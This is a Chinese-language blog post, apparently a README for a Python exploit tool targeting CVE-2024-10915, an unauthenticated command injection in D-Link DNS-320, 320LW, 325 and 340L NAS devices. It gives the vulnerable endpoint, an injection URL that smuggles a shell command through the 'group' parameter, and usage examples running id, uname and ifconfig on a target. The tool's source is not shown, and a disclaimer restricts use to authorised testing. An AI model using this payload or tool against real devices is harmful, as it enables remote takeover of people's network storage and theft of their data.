D-Link NAS命令注入漏洞CVE-2024-10915利用详解

本文详细介绍了针对D-Link多款NAS产品的命令注入漏洞CVE-2024-10915的Python利用工具,包含漏洞描述、受影响产品、使用方法和示例演示,支持通过代理执行任意系统命令。

CVE-2024-10915 - D-Link NAS命令注入漏洞利用

此基于Python的漏洞利用工具针对多个D-Link NAS产品中通过/cgi-bin/account_mgr.cgi?cmd=cgi_user_add端点存在的命令注入漏洞。该漏洞允许未经身份验证的攻击者在受影响的设备上执行任意系统命令。

漏洞描述

CVE-2024-10915影响多个D-Link NAS型号。攻击者可以通过cgi_user_add命令中的group参数注入命令,导致远程代码执行。

受影响产品

  • D-Link DNS-320
  • D-Link DNS-320LW
  • D-Link DNS-325
  • D-Link DNS-340L

漏洞端点:/cgi-bin/account_mgr.cgi?cmd=cgi_user_add

示例:

1
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

要求

  • Python 3.x
  • requests库

安装所需依赖:

1
pip3 install requests

使用方法

1
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

选项:

选项 描述
-u / --url 目标基础URL(例如:http://192.168.1.100
-c / --command 在设备上执行的命令(默认:id
-p / --proxy 使用HTTP代理(例如:http://127.0.0.1:8080
-o / --output 将HTTP响应保存到文件
-l / --list 列出受影响的D-Link NAS产品

示例1

1
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 

id


示例2

1
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 

uname

示例3

1
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 

ifconfig


⚠️ 免责声明

本项目仅用于教育和授权测试目的。 请勿在未经明确许可的网络或系统上使用此工具。 作者对任何误用或造成的损害不承担任何责任。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计